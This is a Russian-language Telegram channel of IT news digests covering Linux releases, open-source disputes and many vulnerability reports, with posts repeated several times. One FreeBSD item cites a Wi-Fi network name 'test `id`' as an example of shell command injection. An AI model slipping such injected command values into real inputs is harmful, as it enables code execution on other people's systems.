Доброго времени суток! Представляю вашему вниманию дайджест около-айтишных новостей за прошедшую неделю (16 - 23 марта).
- Уязвимости в snapd и Rust Сoreutils, позволяющие получить root-привилегии в Ubuntu. В snap все дело в некорректном взаимодействии утилит snap-confine и systemd-tmpfiles, а во втором не был реализован безопасный обход путей и можно было подменить при вызове, например, rm, удаляемую директорию на ссылку и удалить что-то не то.
- Выпуск среды рабочего стола GNOME 50 с удалением поддержки X11. Как и обещали, собстна. Но сообщество уже подсуетилось и поехало пилить GNOME-X11, форк с возвращенной поддержкой иксов.
- Google анонсировал новый процесс установки сторонних приложений в Android. Выглядит, конечно, не очень юзер-френдли, но вполне себе неплохой UX для домохозяек.
- Релизы дистров и ОСей: OpenWrt 24.10.6 и 25.12.1, предварительный выпуск SteamOS 3.8.0, antiX 26.
Также у меня появился канал в MAX, присоединяйтесь!
- Уязвимости в snapd и Rust Сoreutils, позволяющие получить root-привилегии в Ubuntu. В snap все дело в некорректном взаимодействии утилит snap-confine и systemd-tmpfiles, а во втором не был реализован безопасный обход путей и можно было подменить при вызове, например, rm, удаляемую директорию на ссылку и удалить что-то не то.
- Выпуск среды рабочего стола GNOME 50 с удалением поддержки X11. Как и обещали, собстна. Но сообщество уже подсуетилось и поехало пилить GNOME-X11, форк с возвращенной поддержкой иксов.
- Google анонсировал новый процесс установки сторонних приложений в Android. Выглядит, конечно, не очень юзер-френдли, но вполне себе неплохой UX для домохозяек.
- Релизы дистров и ОСей: OpenWrt 24.10.6 и 25.12.1, предварительный выпуск SteamOS 3.8.0, antiX 26.
Также у меня появился канал в MAX, присоединяйтесь!
👍3
А говорят, что у нас распилы прям распилы. Смотрите, там тоже (:
Также у меня появился канал в MAX, присоединяйтесь!
Также у меня появился канал в MAX, присоединяйтесь!
Мне кажется, или WAF у DNS сломался?
(я без VPN, если что)
Также у меня появился канал в MAX, присоединяйтесь!
(я без VPN, если что)
Также у меня появился канал в MAX, присоединяйтесь!
Доброго времени суток! Представляю вашему вниманию дайджест около-айтишных новостей за прошедшие две недели (24 марта - 6 апреля).
- В Telega, альтернативном клиенте Telegram, выявили возможность совершения MITM-атаки. В общем, не используйте сторонние клиенты, дамы и господа, иначе ваши данные утекут, прям как в случае с Nekogram.
- Атаки на цепочку поставок прошедших двух недель: litellm, axios (разбор), pypi-пакет telnyx. Проверяйтесь и обновляйтесь по необхоимости!
- Грег Кроа-Хартман заметил улучшение в отчетах об ошибках от ИИ. Те, кто еще сомневаются, должны попробовать ИИшечку на своей кодовой базе (конечно же, с учетом возможных рисков утечки вашего кода для обучения оной). Верим и надеемся, что скоро ИИшечки будут компактны и производительны и им не нужно будет суперкластера для работы.
- Основатель и лидер Ubuntu MATE объявил об уходе из проекта. Интересы поменялись, MATE пару лет как в тотальной стагнации, беток свежего релиза Ubuntu до сих пор нет. Помянем?
- Более подробный разбор драмы ONLYOFFICE vs Euro-Office, о котором я писал ранее.
- Утечка кода инструментария Claude Code из-за забытого в NPM-пакете map-файла. Nuff said, happens even with the best of us. Не забудьте проверить, что у вас настроены хотя бы детекторы утечки кредов в гитцы 😊.
- Продолжение драмы Collabora vs TDF. На этот раз вторые исключили из своих рядов первых (включая сооснователей LibreOffice) в соответствии с новым принятым уставом, который не допускает присутствие в рядах сотрудников компаний, с которыми ведутся юридические разбирательства. Заряжаем еще одно ведро попкорна!
- Атаки GDDRHammer и GeForge, искажающие память GPU для доступа ко всей памяти CPU. Вкраце: ломая память GPU получаем доступ к памяти CPU (которая обычная RAM). Вроде бы есть методы защиты (включить ECC), но включение оных спровоцирует дополнительные накладные расходы при работе, а также потенциальное открытие двух других уязвимостей - ECCploit и ECC.fail. Получается максимально веселая ситуация - как бы вы ни старались, вас все равно поимеют 🫠.
- В ядре Linux 7.0 выявили регрессию, в два раза снижающую производительность PostgreSQL. PREEMPT_LAZY стал по-умолчанию для планировщика вместо PREEMPT_NONE, pgbench “simple-update” упал почти в два раза - с 98565 до 50751. Предлагается вернуть PREEMPT_NONE по-умолчанию, однако некоторые заявляют, что надо чинить юзерспейс (то есть постгрю), задействовать недавно добавленное в ядро расширение “rseq slice” (Restartable Sequences) для ограничения вероятности вытеснения держателя блокировки. Пахнет некоторой драмой, возможно стоит подготовить поп-корн, а пока ждем, что скажет Торвальдс.
- Возобновлены попытки удаления поддержки процессоров i486 из ядра Linux. Старичку давно пора на покой, отпустите его уже! А там, где такие CPU используются, можно и старый Linux попользовать.
- Релизы дистров и ОСей: VitruvianOS (гибрид окружения Haiku и ядра Linux), Ubuntu 26.04 Beta, Android 17 Beta 3, SystemRescue 13, ALT Mobile 11.0, 4MLinux 51.0, Apertis 2026 (позволяющий не использовать GPLv3 код), ROSA Fresh 13.2, /e/OS 3.6.
А вот конкретно сейчас зазывать вас в Max не буду, потому что эти долдоны сломали и markdown, и редактирование отложенного сообщения, чтобы в канал запостить уже хорошо отформатированное. Лучи поноса этим товарищам!
- В Telega, альтернативном клиенте Telegram, выявили возможность совершения MITM-атаки. В общем, не используйте сторонние клиенты, дамы и господа, иначе ваши данные утекут, прям как в случае с Nekogram.
- Атаки на цепочку поставок прошедших двух недель: litellm, axios (разбор), pypi-пакет telnyx. Проверяйтесь и обновляйтесь по необхоимости!
- Грег Кроа-Хартман заметил улучшение в отчетах об ошибках от ИИ. Те, кто еще сомневаются, должны попробовать ИИшечку на своей кодовой базе (конечно же, с учетом возможных рисков утечки вашего кода для обучения оной). Верим и надеемся, что скоро ИИшечки будут компактны и производительны и им не нужно будет суперкластера для работы.
- Основатель и лидер Ubuntu MATE объявил об уходе из проекта. Интересы поменялись, MATE пару лет как в тотальной стагнации, беток свежего релиза Ubuntu до сих пор нет. Помянем?
- Более подробный разбор драмы ONLYOFFICE vs Euro-Office, о котором я писал ранее.
- Утечка кода инструментария Claude Code из-за забытого в NPM-пакете map-файла. Nuff said, happens even with the best of us. Не забудьте проверить, что у вас настроены хотя бы детекторы утечки кредов в гитцы 😊.
- Продолжение драмы Collabora vs TDF. На этот раз вторые исключили из своих рядов первых (включая сооснователей LibreOffice) в соответствии с новым принятым уставом, который не допускает присутствие в рядах сотрудников компаний, с которыми ведутся юридические разбирательства. Заряжаем еще одно ведро попкорна!
- Атаки GDDRHammer и GeForge, искажающие память GPU для доступа ко всей памяти CPU. Вкраце: ломая память GPU получаем доступ к памяти CPU (которая обычная RAM). Вроде бы есть методы защиты (включить ECC), но включение оных спровоцирует дополнительные накладные расходы при работе, а также потенциальное открытие двух других уязвимостей - ECCploit и ECC.fail. Получается максимально веселая ситуация - как бы вы ни старались, вас все равно поимеют 🫠.
- В ядре Linux 7.0 выявили регрессию, в два раза снижающую производительность PostgreSQL. PREEMPT_LAZY стал по-умолчанию для планировщика вместо PREEMPT_NONE, pgbench “simple-update” упал почти в два раза - с 98565 до 50751. Предлагается вернуть PREEMPT_NONE по-умолчанию, однако некоторые заявляют, что надо чинить юзерспейс (то есть постгрю), задействовать недавно добавленное в ядро расширение “rseq slice” (Restartable Sequences) для ограничения вероятности вытеснения держателя блокировки. Пахнет некоторой драмой, возможно стоит подготовить поп-корн, а пока ждем, что скажет Торвальдс.
- Возобновлены попытки удаления поддержки процессоров i486 из ядра Linux. Старичку давно пора на покой, отпустите его уже! А там, где такие CPU используются, можно и старый Linux попользовать.
- Релизы дистров и ОСей: VitruvianOS (гибрид окружения Haiku и ядра Linux), Ubuntu 26.04 Beta, Android 17 Beta 3, SystemRescue 13, ALT Mobile 11.0, 4MLinux 51.0, Apertis 2026 (позволяющий не использовать GPLv3 код), ROSA Fresh 13.2, /e/OS 3.6.
А вот конкретно сейчас зазывать вас в Max не буду, потому что эти долдоны сломали и markdown, и редактирование отложенного сообщения, чтобы в канал запостить уже хорошо отформатированное. Лучи поноса этим товарищам!
Computers were a mistake
эти долдоны сломали и markdown, и редактирование отложенного сообщения, чтобы в канал запостить уже хорошо отформатированное
Please open Telegram to view this post
VIEW IN TELEGRAM
Доброго времени суток! Представляю вашему вниманию дайджест около-айтишных новостей за прошедшую неделю (7 - 13 апреля).
- В ядро Linux предложено включить распределённое реплицируемое блочное устройство DRBD 9. Отделение от TCP звучит вкусно, как и всякие улучшения производительности. Прямо уже хочется где-нибудь попробовать. А вообще помню, что с DRBD 8 было приличное количество спецэффектов, пользующие в проде, расскажите, как оно?
- Доля пользователей Linux в Steam превысила 5%. Вендекапец близко!
- Проект Solod развивает подмножество языка Go, транслируемое в язык Си. Без каналов и горутин выглядит как (пока что) какое-то ненужно, ибо это одни из основных фич языка Go. Посмотрим, что будет с этим проектом в будущем.
- Microsoft заблокировал учётные записи для заверения релизов VeraCrypt и WireGuard. Пока Макрософаг на связь с разработчиками не выйдет - новых релизов не будет, блокировка была произведена без предварительного уведомления. Особенно это забавно в виду того, что wireguard использует сам Microsoft в своем продукте Azure Kubernetes Service.
- Релиз Chrome 147 с поддержкой вертикальных вкладок и переделанным режимом чтения. Последнее нафиг не интересно, а вот первое - очень даже. Я хромого не пользую, но выглядит не совсем отвратно. Кто на нем - как вам вертикальные вкладки? А если сможете сравнить с Tree Style Tabs из Firefox - то будет вообще бесценно!
- Опубликована Linux-версия межсетевого экрана приложений Little Snitch. Примечательно, что для Linux оно все бесплатно либо опенсорсно, а вот пользователи яблока должны страдать (примерно по 60 тугриков за лицензию). Вот что GPL животворящий делает! 🫠
Очередные уязвимости и атаки:
- Атака GPUBreach, позволяющая получить root-доступ через выполнение CUDA-кода на GPU NVIDIA. Атака опасная, и скорее всего будет использоваться в комбинации с другой, чтобы получть какой-либо доступ к системе, а потом рутануть. Причем работает даже через IOMMU, так что как только будет апдейт с фиксом - обновляйтесь!
- Уязвимость во Flatpak, позволяющая выполнить код вне изолированного окружения. Уязвимость в dbus сервисе flatpak-portal, который является неким "проксиком" к реальным порталам (это всякие окна выбора файлов/диалогов, шаринга экрана, микрофон-камера и все такое прочее, предоставляемое системой для приложений). Пока что для быстрофикса этот "проксик" можно отключить через systemd. Ну а также там есть еще несколько уязвимостей, хоть и не совсем критичный (у этой - 9.3 из 10 скора), но тоже неприятные, поэтому обновляйтесь как будет обновление доступно!
- Опасные уязвимости в GStreamer, CUPS, wolfSSL, OpenSSL, OpenClaw, Nix и ядре Linux. Очень много уязвимостей в различных приложениях и библиотеках, обновляйтесь по возможности!
- Релизы дистров и ОСей: Deepin 25.1, Trisquel 12.0 (для тотальных фанатов швабодки).
Также у меня появился канал в MAX, присоединяйтесь! Они чуток пофиксили парсинг markdown!
- В ядро Linux предложено включить распределённое реплицируемое блочное устройство DRBD 9. Отделение от TCP звучит вкусно, как и всякие улучшения производительности. Прямо уже хочется где-нибудь попробовать. А вообще помню, что с DRBD 8 было приличное количество спецэффектов, пользующие в проде, расскажите, как оно?
- Доля пользователей Linux в Steam превысила 5%. Вендекапец близко!
- Проект Solod развивает подмножество языка Go, транслируемое в язык Си. Без каналов и горутин выглядит как (пока что) какое-то ненужно, ибо это одни из основных фич языка Go. Посмотрим, что будет с этим проектом в будущем.
- Microsoft заблокировал учётные записи для заверения релизов VeraCrypt и WireGuard. Пока Макрософаг на связь с разработчиками не выйдет - новых релизов не будет, блокировка была произведена без предварительного уведомления. Особенно это забавно в виду того, что wireguard использует сам Microsoft в своем продукте Azure Kubernetes Service.
- Релиз Chrome 147 с поддержкой вертикальных вкладок и переделанным режимом чтения. Последнее нафиг не интересно, а вот первое - очень даже. Я хромого не пользую, но выглядит не совсем отвратно. Кто на нем - как вам вертикальные вкладки? А если сможете сравнить с Tree Style Tabs из Firefox - то будет вообще бесценно!
- Опубликована Linux-версия межсетевого экрана приложений Little Snitch. Примечательно, что для Linux оно все бесплатно либо опенсорсно, а вот пользователи яблока должны страдать (примерно по 60 тугриков за лицензию). Вот что GPL животворящий делает! 🫠
Очередные уязвимости и атаки:
- Атака GPUBreach, позволяющая получить root-доступ через выполнение CUDA-кода на GPU NVIDIA. Атака опасная, и скорее всего будет использоваться в комбинации с другой, чтобы получть какой-либо доступ к системе, а потом рутануть. Причем работает даже через IOMMU, так что как только будет апдейт с фиксом - обновляйтесь!
- Уязвимость во Flatpak, позволяющая выполнить код вне изолированного окружения. Уязвимость в dbus сервисе flatpak-portal, который является неким "проксиком" к реальным порталам (это всякие окна выбора файлов/диалогов, шаринга экрана, микрофон-камера и все такое прочее, предоставляемое системой для приложений). Пока что для быстрофикса этот "проксик" можно отключить через systemd. Ну а также там есть еще несколько уязвимостей, хоть и не совсем критичный (у этой - 9.3 из 10 скора), но тоже неприятные, поэтому обновляйтесь как будет обновление доступно!
- Опасные уязвимости в GStreamer, CUPS, wolfSSL, OpenSSL, OpenClaw, Nix и ядре Linux. Очень много уязвимостей в различных приложениях и библиотеках, обновляйтесь по возможности!
- Релизы дистров и ОСей: Deepin 25.1, Trisquel 12.0 (для тотальных фанатов швабодки).
Также у меня появился канал в MAX, присоединяйтесь! Они чуток пофиксили парсинг markdown!
👍4❤1
Доброго времени суток! Представляю вашему вниманию дайджест около-айтишных новостей за прошедшие 2 недели (14 - 27 апреля).
- Релиз ядра Linux 7.0. Из интересного - правила ИИ-патчей (разраб должен верифицировать, а не просто отослать), NFS 4.1 по-умолчанию, rust теперь как один из основных ЯП, BPF в io_uring, начальная реализация wifi 8, оптимизации UDP (до 12% на 100 гбит).
- Чистка в ядре Linux: удалены опции сборки для процессоров i486, удаление поддержка процессоров Baikal, удаление старых Ethernet-драйверов.
- В OpenBSD переименовали поле в pfsync после ложного AI-отчёта об уязвимости. Или почему за ИИшечкой всегда надо все проверять и почему появились, например, такие товарищи.
- SDL запретил приём кода от AI. Созданы форки Vim, избавленные от AI-изменений. Если Linux, например, написал правила, то ярые противники ИИшечки, во-первых, запрещают писать код с помощью ИИ, а во-вторых пилят ИИ-free форки (то есть удаляют код, сгенерированный ИИ, в форке). Но по правде говоря, заголовок байтовый, ибо SDL пошел по пути Linux (код, сгенерированный ИИ, должен быть проверен человеком).
- Отчеты о развитии KDE. Из интересного - менеджмент сессий в Wayland, переключение рабочих столов на каждом экране отдельно, разделение по названием GPU в system monitor, для видеокарт intel (i915 и xe) включена поддержка аппаратных overlay-плоскостей.
- Уязвимости в Java SE, MySQL, VirtualBox и других продуктах Oracle. Очередная пачка уязвимостей, не забудьте обновиться.
- Проект WSL9x для запуска современных Linux-ядер в окружении Windows 95. Чем бы дитя не тешилось, лишь бы по подъездам не шарилось ©. Реальная юзабельность в дикой природе под вопросом, конечно же, но идея забавная (и ведь работает!).
- В Rust Coreutils выявлено 113 уязвимостей. В Ubuntu 26.04 возвращены cp, mv и rm из GNU Coreutils. В очередной раз убеждаемся, что "серебряной пули" не существует, и что код говно не потому, что написан на Си, а потому что разрабы - криворукие дураки.
- Релизы дистров и ОСей: Raspberry Pi OS 2026-04-13, Альт Рабочая станция К 11.3, Zorin OS 18.1, Solus 4.9, GhostBSD 26.1, Ubuntu 26.04, CachyOS 260426.
Также у меня появился канал в MAX, присоединяйтесь!
- Релиз ядра Linux 7.0. Из интересного - правила ИИ-патчей (разраб должен верифицировать, а не просто отослать), NFS 4.1 по-умолчанию, rust теперь как один из основных ЯП, BPF в io_uring, начальная реализация wifi 8, оптимизации UDP (до 12% на 100 гбит).
- Чистка в ядре Linux: удалены опции сборки для процессоров i486, удаление поддержка процессоров Baikal, удаление старых Ethernet-драйверов.
- В OpenBSD переименовали поле в pfsync после ложного AI-отчёта об уязвимости. Или почему за ИИшечкой всегда надо все проверять и почему появились, например, такие товарищи.
- SDL запретил приём кода от AI. Созданы форки Vim, избавленные от AI-изменений. Если Linux, например, написал правила, то ярые противники ИИшечки, во-первых, запрещают писать код с помощью ИИ, а во-вторых пилят ИИ-free форки (то есть удаляют код, сгенерированный ИИ, в форке). Но по правде говоря, заголовок байтовый, ибо SDL пошел по пути Linux (код, сгенерированный ИИ, должен быть проверен человеком).
- Отчеты о развитии KDE. Из интересного - менеджмент сессий в Wayland, переключение рабочих столов на каждом экране отдельно, разделение по названием GPU в system monitor, для видеокарт intel (i915 и xe) включена поддержка аппаратных overlay-плоскостей.
- Уязвимости в Java SE, MySQL, VirtualBox и других продуктах Oracle. Очередная пачка уязвимостей, не забудьте обновиться.
- Проект WSL9x для запуска современных Linux-ядер в окружении Windows 95. Чем бы дитя не тешилось, лишь бы по подъездам не шарилось ©. Реальная юзабельность в дикой природе под вопросом, конечно же, но идея забавная (и ведь работает!).
- В Rust Coreutils выявлено 113 уязвимостей. В Ubuntu 26.04 возвращены cp, mv и rm из GNU Coreutils. В очередной раз убеждаемся, что "серебряной пули" не существует, и что код говно не потому, что написан на Си, а потому что разрабы - криворукие дураки.
- Релизы дистров и ОСей: Raspberry Pi OS 2026-04-13, Альт Рабочая станция К 11.3, Zorin OS 18.1, Solus 4.9, GhostBSD 26.1, Ubuntu 26.04, CachyOS 260426.
Также у меня появился канал в MAX, присоединяйтесь!
👍4
Тем временем вышел Zed 1.0. Так как я его периодически потыкиваю, ибо он чуть-чуть недотягивал до удобства VSCode'а, решил потыкать и в этот раз.
Из замеченного:
- Появилась возможность вывести закрепленные вкладки в отдельную строку, выше обычных вкладок. Ура!
- Информативное дерево изменений в git.
- Возможность красиво посмотреть коммиты и ветки в git.
- Возможность иметь несколько рабочих деревьев для проекта в git.
- Возможность работать с ветками (создание, переключение, удаление) в git.
- Относительно адекватно работающий sticky scroll (это когда вы скроллите, а текущая область кода, так же известные как скоуп/функции/классы, отображаются сверху).
Собственно, 1.0 не зря есть 1.0. В принципе, можно пользовать. Но конечно же, ложка дегтя присутствует - у меня на Macbook Pro M4 при скроллинге жрется 50-60% GPU, что может сделать очень печальной работу с локальными ИИшками, которые я пользую для автодополнения. Настроек как это починить или снизить влияние я не нашел, ну и стоит учитывать, что это не Electron и тут прямой рендер через GPU, так что ждем фиксов с оптимизациями, наверняка последуют.
Также у меня появился канал в MAX, присоединяйтесь!
Из замеченного:
- Появилась возможность вывести закрепленные вкладки в отдельную строку, выше обычных вкладок. Ура!
- Информативное дерево изменений в git.
- Возможность красиво посмотреть коммиты и ветки в git.
- Возможность иметь несколько рабочих деревьев для проекта в git.
- Возможность работать с ветками (создание, переключение, удаление) в git.
- Относительно адекватно работающий sticky scroll (это когда вы скроллите, а текущая область кода, так же известные как скоуп/функции/классы, отображаются сверху).
Собственно, 1.0 не зря есть 1.0. В принципе, можно пользовать. Но конечно же, ложка дегтя присутствует - у меня на Macbook Pro M4 при скроллинге жрется 50-60% GPU, что может сделать очень печальной работу с локальными ИИшками, которые я пользую для автодополнения. Настроек как это починить или снизить влияние я не нашел, ну и стоит учитывать, что это не Electron и тут прямой рендер через GPU, так что ждем фиксов с оптимизациями, наверняка последуют.
Также у меня появился канал в MAX, присоединяйтесь!
👍4
Думаем, куда с товарищем @leaveitru переезжать техническим доменом, который был в зоне wtf.
Пока выбирали домен рег.ру сделал такое предложение. Нраица! :D
Также у меня появился канал в MAX, присоединяйтесь!
Пока выбирали домен рег.ру сделал такое предложение. Нраица! :D
Также у меня появился канал в MAX, присоединяйтесь!
Computers were a mistake
Тем временем вышел Zed 1.0. Так как я его периодически потыкиваю, ибо он чуть-чуть недотягивал до удобства VSCode'а, решил потыкать и в этот раз. Из замеченного: - Появилась возможность вывести закрепленные вкладки в отдельную строку, выше обычных вкладок.…
Кстати, забавностей с Zed прибыло.
Курсор на строчке с первым параметром, но подсвечивает уже второй параметр в сигнатуре функции.
И это и правильно, и неправильно одновременно. Правильно с позиции разбора кода (запятая есть разделитель параметров), а неправильно с UX позиции (гошка позволяет форматировать код таким образом, и удобнее было бы видеть подсвеченным первый параметр).
Также у меня появился канал в MAX, присоединяйтесь!
Курсор на строчке с первым параметром, но подсвечивает уже второй параметр в сигнатуре функции.
И это и правильно, и неправильно одновременно. Правильно с позиции разбора кода (запятая есть разделитель параметров), а неправильно с UX позиции (гошка позволяет форматировать код таким образом, и удобнее было бы видеть подсвеченным первый параметр).
Также у меня появился канал в MAX, присоединяйтесь!
🌚5👎1
Доброго времени суток! Представляю вашему вниманию дайджест около-айтишных новостей за прошедшую неделю (28 апреля - 5 мая).
- В Ubuntu намечена интеграция AI. С одной стороны неплохое начинание, с другой все мы помним про интеграцию рекламы и следилок в Unity, поэтому к этой штуке надо относиться с осторожностью. Но за что можно сказать "спасибо" - все ИИшности будут исполняться только локально.
- Представлен GTK2-NG, форк библиотеки GTK2. У меня с этим тулкитом связаны самые приятные воспоминания, начиная от тем rezlooks и заканчивая софтом на Go и GTK2, который я писал. Простой, но в то же время фичастый, хоть и не всегда удобный (привет, rich text). Посмотрим, во что это выльется.
- Notepad++ теперь доступен на macOS как нативное приложение. Возрадуйтесь все те, кому TextEdit.app (встроенный текстовый редактор в macOS) было мало, теперь вы можете при переезде с винды пользовать что-то привычное! Однако не все так радужно, на самом деле, так как, во-первых, плагины надо портировать, а во-вторых, автор Notepad++ потребовал переименовать порт для macOS из-за нарушения товарного знака, так что в скором времени все вернется на круги своя и вы будете скачивать сторонний редактор, который, возможно, похож на Notepad++, и даже имеет схожий функционал, но называется по-другому. А вообще к автору порта есть вопросы, так как Дон Хо (автор Notepad++) утверждает, что код был написан ИИшечкой и в принципе какого-то отношения к Notepad++ не имеет.
- Очередной отчет о развитии KDE. Из интересного - поддержка портала "background apps" (приложение может убрать окна и оставить свой значок в трее), улучшения в контроле доступа к устройствам ввода, улучшено автоматическое управление яркостью экрана.
Подборочка взломов и уязвимостей:
- В Python-пакет elementary-data, имеющий 1.1 млн загрузок в месяц, внедрён вредоносный код. Нет, это не про ElementaryOS, а другая элементарная штука, связанная с ИИшечкой и базами данных. Так что одни выдыхают, а другие в очередной раз в мыле из-за уязвимости в шаге Github Actions.
- Copy Fail - уязвимость в ядре Linux, позволяющая получить root в большинстве дистрибутивов. Вкраце - вас могут поиметь в любом дистрибутиве и получить root-доступ, но требуется локальный доступ к компу. Проблема проявляется начиная с ядра Linux 4.14 (2017 год) ¯\_(ツ)_⧸¯. Так что как увидите обновление - сразу обновляйтесь, мало ли.
- Релизы дистров и ОСей: Fedora Linux 44, Bazzite 44, Proxmox Backup Server 4.2.
Также у меня появился канал в MAX, присоединяйтесь!
- В Ubuntu намечена интеграция AI. С одной стороны неплохое начинание, с другой все мы помним про интеграцию рекламы и следилок в Unity, поэтому к этой штуке надо относиться с осторожностью. Но за что можно сказать "спасибо" - все ИИшности будут исполняться только локально.
- Представлен GTK2-NG, форк библиотеки GTK2. У меня с этим тулкитом связаны самые приятные воспоминания, начиная от тем rezlooks и заканчивая софтом на Go и GTK2, который я писал. Простой, но в то же время фичастый, хоть и не всегда удобный (привет, rich text). Посмотрим, во что это выльется.
- Notepad++ теперь доступен на macOS как нативное приложение. Возрадуйтесь все те, кому TextEdit.app (встроенный текстовый редактор в macOS) было мало, теперь вы можете при переезде с винды пользовать что-то привычное! Однако не все так радужно, на самом деле, так как, во-первых, плагины надо портировать, а во-вторых, автор Notepad++ потребовал переименовать порт для macOS из-за нарушения товарного знака, так что в скором времени все вернется на круги своя и вы будете скачивать сторонний редактор, который, возможно, похож на Notepad++, и даже имеет схожий функционал, но называется по-другому. А вообще к автору порта есть вопросы, так как Дон Хо (автор Notepad++) утверждает, что код был написан ИИшечкой и в принципе какого-то отношения к Notepad++ не имеет.
- Очередной отчет о развитии KDE. Из интересного - поддержка портала "background apps" (приложение может убрать окна и оставить свой значок в трее), улучшения в контроле доступа к устройствам ввода, улучшено автоматическое управление яркостью экрана.
Подборочка взломов и уязвимостей:
- В Python-пакет elementary-data, имеющий 1.1 млн загрузок в месяц, внедрён вредоносный код. Нет, это не про ElementaryOS, а другая элементарная штука, связанная с ИИшечкой и базами данных. Так что одни выдыхают, а другие в очередной раз в мыле из-за уязвимости в шаге Github Actions.
- Copy Fail - уязвимость в ядре Linux, позволяющая получить root в большинстве дистрибутивов. Вкраце - вас могут поиметь в любом дистрибутиве и получить root-доступ, но требуется локальный доступ к компу. Проблема проявляется начиная с ядра Linux 4.14 (2017 год) ¯\_(ツ)_⧸¯. Так что как увидите обновление - сразу обновляйтесь, мало ли.
- Релизы дистров и ОСей: Fedora Linux 44, Bazzite 44, Proxmox Backup Server 4.2.
Также у меня появился канал в MAX, присоединяйтесь!
👍4
Доброго времени суток! Представляю вашему вниманию дайджест около-айтишных новостей за прошедшие 3 недели (6 - 25 мая). Эти 3 недели, возможно, из-за весеннего обострения, оказались богаты на всякие уязвимости и утечки.
Скоро ЧМ по футболу, поэтому сроки поставки свежих дайджестов где-то до конца июня могут быть увеличены. Работа, понимаете ли.
1/2
- Уязвимости в Nix и Lix, позволяющие поднять привилегии в системе. Пофиксили рекурсивную распаковку, докинули проверочек и валидаций. Классика.
- Уязвимость в CPU AMD Zen 2, позволяющая повысить привилегии и обойти изоляцию виртуальных машин. Если вы обновляли микрокод на десктопе и ноуте (drk.xfz Threadripper) - вы в безопасности, а вот пользователи EPYC должны дождаться пропатченного ядра/Xen и фикситься софтово.
- Подборочка уязвимостей в ядре Linux: Dirty Frag, Fragnesia, DirtyDecrypt, уязвимость в pidfd, PinTheft, GRO Frag. Предложен killswitch для экстренного отключения уязвимой функциональности в ядре Linux.
- Уязвимость в системном вызове execve, предоставляющая root-доступ во FreeBSD. Ошибка математики привела к тому, что копировалось больше данных, чем нужно, что позволяло выполнить в итоге свой код. Также во фряхе устранили еще несколько уязвимостей, все они либо про переполнение буфера/стека, либо про кривую математику, либо классический use after free.
- Уязвимости в dnsmasq, допускающие отравление DNS-кэша и выполнение кода с правами root. Классика - переполнение буфера, чтение за пределами буфера из-за недостаточной валидации. Обновляйтесь, если пользуете.
- Уязвимость в Exim, приводящая к удалённому выполнению кода на сервере. Проблема проявляется у фанатов швабодки, собирающих Exim с GNUTLS, и является обычным use after free, который можно эксплуатировать для выполнения кода на сервере с правами процесса.
- Обновление nginx 1.31.0 с устранением RCE-уязвимости, эксплуатируемой через HTTP-запрос. Все из-за rewrite модуля, который выделял память на URL с неэкранированными спецсимволами, а помещал туда уже экранированные (и, соответственно, строка становилась длиннее). Присутствует уязвимость, внимание, с версии 0.6.27 от марта 2008 года, так что поздравляем ее с совершеннолетием :). Также в этой версии есть несколько классических уязвимостей вида use after free, чтение за пределами выделенного буфера и т.д. Ну и сразу же опять фикс переполнения буфера в rewrite модуле.
- QEMUtiny - уязвимости в QEMU, позволяющие получить доступ к хост-окружению из гостевой системы. Ничего нового - чтение за пределами выделенного буфера. Но сейчас есть эксплоит только для последней версии (11.0.0), однако исследователи, обнаружившие уязвимость, утверждают, что можно с помощью сканирования памяти процесса сделать его универсальным (но им, видимо, лень). В общем, откатывайтесь или обновляйтесь :).
- Компрометация GitHub-токена Grafana Labs привела к утечке закрытого кода. Код увели, разрабов шантажировани, платить разрабы отказались. Ждем появление кода на всяких хацкерских форумах в даркнете?
- Во FreeBSD устранено 4 уязвимости, позволяющие поднять привилегии, и одна удалённая root-уязвимость. Опять же, классика - отсутствие экранирования спецсимволов (и ведь пришло кому-то в голову точку доступа к вифи называть как "test `id`"!), use-after-free, отсутствие валидации и переполнения буферов. Обновляйтесь, в общем, все фиксы уже доступны к накатыванию.
Также у меня появился канал в MAX, присоединяйтесь!
Скоро ЧМ по футболу, поэтому сроки поставки свежих дайджестов где-то до конца июня могут быть увеличены. Работа, понимаете ли.
1/2
- Уязвимости в Nix и Lix, позволяющие поднять привилегии в системе. Пофиксили рекурсивную распаковку, докинули проверочек и валидаций. Классика.
- Уязвимость в CPU AMD Zen 2, позволяющая повысить привилегии и обойти изоляцию виртуальных машин. Если вы обновляли микрокод на десктопе и ноуте (drk.xfz Threadripper) - вы в безопасности, а вот пользователи EPYC должны дождаться пропатченного ядра/Xen и фикситься софтово.
- Подборочка уязвимостей в ядре Linux: Dirty Frag, Fragnesia, DirtyDecrypt, уязвимость в pidfd, PinTheft, GRO Frag. Предложен killswitch для экстренного отключения уязвимой функциональности в ядре Linux.
- Уязвимость в системном вызове execve, предоставляющая root-доступ во FreeBSD. Ошибка математики привела к тому, что копировалось больше данных, чем нужно, что позволяло выполнить в итоге свой код. Также во фряхе устранили еще несколько уязвимостей, все они либо про переполнение буфера/стека, либо про кривую математику, либо классический use after free.
- Уязвимости в dnsmasq, допускающие отравление DNS-кэша и выполнение кода с правами root. Классика - переполнение буфера, чтение за пределами буфера из-за недостаточной валидации. Обновляйтесь, если пользуете.
- Уязвимость в Exim, приводящая к удалённому выполнению кода на сервере. Проблема проявляется у фанатов швабодки, собирающих Exim с GNUTLS, и является обычным use after free, который можно эксплуатировать для выполнения кода на сервере с правами процесса.
- Обновление nginx 1.31.0 с устранением RCE-уязвимости, эксплуатируемой через HTTP-запрос. Все из-за rewrite модуля, который выделял память на URL с неэкранированными спецсимволами, а помещал туда уже экранированные (и, соответственно, строка становилась длиннее). Присутствует уязвимость, внимание, с версии 0.6.27 от марта 2008 года, так что поздравляем ее с совершеннолетием :). Также в этой версии есть несколько классических уязвимостей вида use after free, чтение за пределами выделенного буфера и т.д. Ну и сразу же опять фикс переполнения буфера в rewrite модуле.
- QEMUtiny - уязвимости в QEMU, позволяющие получить доступ к хост-окружению из гостевой системы. Ничего нового - чтение за пределами выделенного буфера. Но сейчас есть эксплоит только для последней версии (11.0.0), однако исследователи, обнаружившие уязвимость, утверждают, что можно с помощью сканирования памяти процесса сделать его универсальным (но им, видимо, лень). В общем, откатывайтесь или обновляйтесь :).
- Компрометация GitHub-токена Grafana Labs привела к утечке закрытого кода. Код увели, разрабов шантажировани, платить разрабы отказались. Ждем появление кода на всяких хацкерских форумах в даркнете?
